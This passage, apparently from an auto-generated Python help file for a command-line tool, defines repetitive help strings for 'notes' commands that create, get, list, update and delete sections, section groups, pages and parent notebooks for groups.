show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for groups" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in groups" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: 